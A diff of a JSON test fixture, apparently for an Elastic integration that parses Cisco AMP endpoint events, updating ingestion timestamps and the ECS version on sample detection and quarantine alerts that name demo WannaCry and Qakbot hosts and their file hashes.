@@ -3321,7 +3321,7 @@ }, "event": { "severity": 3, - "ingested": "2021-09-12T17:31:54.500209928Z", + "ingested": "2021-09-13T18:07:28.111216991Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419247189909832000,\"timestamp\":1610639423,\"timestamp_nanoseconds\":686000000,\"date\":\"2021-01-14T15:50:23+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419179204872503298\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "kind": "alert", "action": "Retrospective Detection", @@ -3376,7 +3376,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ 
@@ -3400,7 +3400,7 @@ }, "event": { "severity": 3, - "ingested": "2021-09-12T17:31:54.500212001Z", + "ingested": "2021-09-13T18:07:28.111219057Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419247189909832000,\"timestamp\":1610639423,\"timestamp_nanoseconds\":639000000,\"date\":\"2021-01-14T15:50:23+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419204897366867977\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "kind": "alert", "action": "Retrospective Detection", @@ -3453,7 +3453,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ 
@@ -3473,7 +3473,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:54.500214055Z", + "ingested": "2021-09-13T18:07:28.111221104Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412604589194871000,\"timestamp\":1610637865,\"timestamp_nanoseconds\":994000000,\"date\":\"2021-01-14T15:24:25+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6412604589194870787\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446\"}}}}", "kind": "alert", "action": "Quarantine Failure", @@ -3532,7 +3532,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "user": [ 
@@ -3564,7 +3564,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:54.500216107Z", + "ingested": "2021-09-13T18:07:28.111223166Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412604589194871000,\"timestamp\":1610637865,\"timestamp_nanoseconds\":573000000,\"date\":\"2021-01-14T15:24:25+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6412604589194870787\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"QuotaGroup.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\QuotaGroup\\\\QuotaGroup.exe\",\"identity\":{\"sha256\":\"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446\",\"sha1\":\"f5a171c879b90e77861daf19741b373646d791ff\",\"md5\":\"32c9e6737dbdcbfb7563a3f27e2b1571\"}}}}", "kind": "alert", "action": "Threat Detected", @@ -3619,7 +3619,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "user": [ 
@@ -3645,7 +3645,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:54.500218150Z", + "ingested": "2021-09-13T18:07:28.111225235Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412604589194871000,\"timestamp\":1610637865,\"timestamp_nanoseconds\":479000000,\"date\":\"2021-01-14T15:24:25+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6412604589194870786\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"\",\"file_path\":\"\",\"identity\":{\"sha256\":\"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446\"}}}}", "kind": "alert", "action": "Threat Detected", @@ -3702,7 +3702,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "user": [ 
@@ -3734,7 +3734,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:54.500220195Z", + "ingested": "2021-09-13T18:07:28.111227296Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412604589194871000,\"timestamp\":1610637865,\"timestamp_nanoseconds\":479000000,\"date\":\"2021-01-14T15:24:25+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6412604589194870785\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"QuotaGroup.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\QuotaGroup\\\\QuotaGroup.exe\",\"identity\":{\"sha256\":\"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446\",\"sha1\":\"f5a171c879b90e77861daf19741b373646d791ff\",\"md5\":\"32c9e6737dbdcbfb7563a3f27e2b1571\"}}}}", "kind": "alert", "action": "Threat Detected", @@ -3787,7 +3787,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ 
@@ -3807,7 +3807,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:54.500222246Z", + "ingested": "2021-09-13T18:07:28.111229346Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412604589194871000,\"timestamp\":1610637865,\"timestamp_nanoseconds\":994000000,\"date\":\"2021-01-14T15:24:25+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6412604589194870785\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446\"}}}}", "kind": "alert", "action": "Threat Quarantined", @@ -3858,7 +3858,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ 
@@ -3878,7 +3878,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:54.500224289Z", + "ingested": "2021-09-13T18:07:28.111231419Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419239055241773000,\"timestamp\":1610637529,\"timestamp_nanoseconds\":242000000,\"date\":\"2021-01-14T15:18:49+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419239055241773128\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}", "kind": "alert", "action": "Quarantine Failure", @@ -3944,7 +3944,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "user": [ 
@@ -3974,7 +3974,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:54.500226335Z", + "ingested": "2021-09-13T18:07:28.111233495Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419239055241773000,\"timestamp\":1610637529,\"timestamp_nanoseconds\":242000000,\"date\":\"2021-01-14T15:18:49+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Gen.20gl.1201\",\"detection_id\":\"6419239055241773128\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\WINDOWS\\\\mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"},\"parent\":{\"process_id\":708,\"disposition\":\"Clean\",\"file_name\":\"lsass.exe\",\"identity\":{\"sha256\":\"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71\",\"sha1\":\"7abcc82dc5a05b4f53fd0fbd386738e5555025cf\",\"md5\":\"4e568dbe3fff1a0025eb432dc929b78f\"}}}}}", "kind": "alert", "action": "Threat Detected", @@ -4031,7 +4031,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ 
@@ -4051,7 +4051,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:54.500228382Z", + "ingested": "2021-09-13T18:07:28.111235554Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419239050946806000,\"timestamp\":1610637528,\"timestamp_nanoseconds\":587000000,\"date\":\"2021-01-14T15:18:48+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419239046651838535\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}", "kind": "alert", "action": "Threat Quarantined", @@ -4102,7 +4102,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ 
@@ -4122,7 +4122,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:54.500230510Z", + "ingested": "2021-09-13T18:07:28.111237711Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229335730782000,\"timestamp\":1610635266,\"timestamp_nanoseconds\":87000000,\"date\":\"2021-01-14T14:41:06+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419229331435814971\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "kind": "alert", "action": "Quarantine Failure", @@ -4177,7 +4177,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ 
@@ -4197,7 +4197,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:54.500232553Z", + "ingested": "2021-09-13T18:07:28.111239763Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229335730782000,\"timestamp\":1610635266,\"timestamp_nanoseconds\":56000000,\"date\":\"2021-01-14T14:41:06+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419229331435814970\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "kind": "alert", "action": "Quarantine Failure", @@ -4254,7 +4254,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "user": [ 
@@ -4284,7 +4284,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:54.500234601Z", + "ingested": "2021-09-13T18:07:28.111241843Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229335730782000,\"timestamp\":1610635266,\"timestamp_nanoseconds\":773000000,\"date\":\"2021-01-14T14:41:06+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419229335730782278\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "kind": "alert", "action": "Threat Detected", @@ -4339,7 +4339,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "user": [ 
@@ -4369,7 +4369,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:54.500236656Z", + "ingested": "2021-09-13T18:07:28.111243912Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229335730782000,\"timestamp\":1610635266,\"timestamp_nanoseconds\":648000000,\"date\":\"2021-01-14T14:41:06+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419229335730782277\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "kind": "alert", "action": "Threat Detected", @@ -4424,7 +4424,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "user": [ 
@@ -4454,7 +4454,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:54.500238724Z", + "ingested": "2021-09-13T18:07:28.111245976Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229335730782000,\"timestamp\":1610635266,\"timestamp_nanoseconds\":570000000,\"date\":\"2021-01-14T14:41:06+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419229335730782276\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "kind": "alert", "action": "Threat Detected", @@ -4509,7 +4509,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "user": [ 
@@ -4539,7 +4539,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:54.500240848Z", + "ingested": "2021-09-13T18:07:28.111248029Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229335730782000,\"timestamp\":1610635266,\"timestamp_nanoseconds\":414000000,\"date\":\"2021-01-14T14:41:06+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419229335730782275\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", 